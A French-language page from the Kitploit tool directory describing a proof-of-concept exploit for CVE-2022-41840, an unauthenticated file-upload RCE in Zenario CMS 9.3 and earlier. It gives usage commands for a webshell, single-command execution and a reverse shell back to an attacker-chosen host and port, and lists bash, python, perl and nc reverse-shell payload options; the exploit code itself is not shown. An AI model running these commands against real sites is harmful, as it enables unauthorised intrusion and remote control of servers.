Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2022-41840-PoC — Ceci est l'exploit PoC pour la CVE-2022-41840, affectant Zenario. | Kitploit
Outils/GitHubGitHub/princeaikinsbaidoo/cve-2022-41840-poc
Analyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'IntrusionApprentissage et ÉducationDéveloppement de Charges Utiles
GitHubprinceaikinsbaidoo/cve-2022-41840-poc

CVE-2022-41840-PoC

Ceci est l'exploit PoC pour la CVE-2022-41840, affectant Zenario.

Voir le dépôt
il y a 6 moisPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

Zenario CMS 9.3 - Exploit RCE non authentifié

CVE-2022-41840

Une vulnérabilité d'exécution de code à distance (RCE) non authentifiée affectant Zenario CMS version 9.3 et antérieures. L'exploit exploite une vulnérabilité d'upload de fichier dans le point de terminaison AJAX pour téléverser un webshell PHP et obtenir une exécution de code.

Détails de la vulnérabilité

  • CVE : CVE-2022-41840
  • Version affectée : Zenario CMS <= 9.3
  • Type de vulnérabilité : Upload de fichier non authentifié menant à une RCE
  • Vecteur d'attaque : HTTP POST vers /zenario/ajax.php
  • Privilèges requis : Aucun (non authentifié)

Utilisation

Webshell interactif

root@kitploit:~
python3 zenario_exploit.py --target http://target.com

Exécution d'une commande unique

root@kitploit:~
python3 zenario_exploit.py --target http://target.com --cmd "id"

Shell inversé

root@kitploit:~
python3 zenario_exploit.py --target http://target.com --lhost 10.x.x.x --lport 4444

Prérequis

  • Python 3.x
  • Bibliothèque requests

Installer les dépendances :

root@kitploit:~
pip install requests

Fonctionnalités

  • Upload automatique d'un webshell PHP via le point de terminaison AJAX vulnérable
  • Prise en charge de plusieurs valeurs instanceId pour augmenter le taux de réussite
  • Extraction du chemin basée sur JSON et expressions régulières
  • Plusieurs options de charge utile de shell inversé (bash, python, perl, nc)
  • Shell PTY entièrement interactif avec prise en charge du terminal
  • Repli sur le webshell si le shell inversé échoue

Avertissement

À des fins éducatives et de tests de sécurité autorisés uniquement.

Cet outil est fourni aux chercheurs en sécurité et aux testeurs d'intrusion pour tester les systèmes qu'ils possèdent ou pour lesquels ils disposent d'une autorisation explicite. L'accès non autorisé à des systèmes informatiques est illégal et strictement interdit.

Les mainteneurs déclinent toute responsabilité en cas d'utilisation abusive ou de dommages causés par cet outil.

Licence

Ce code est fourni à des fins éducatives.

Télécharger l’outil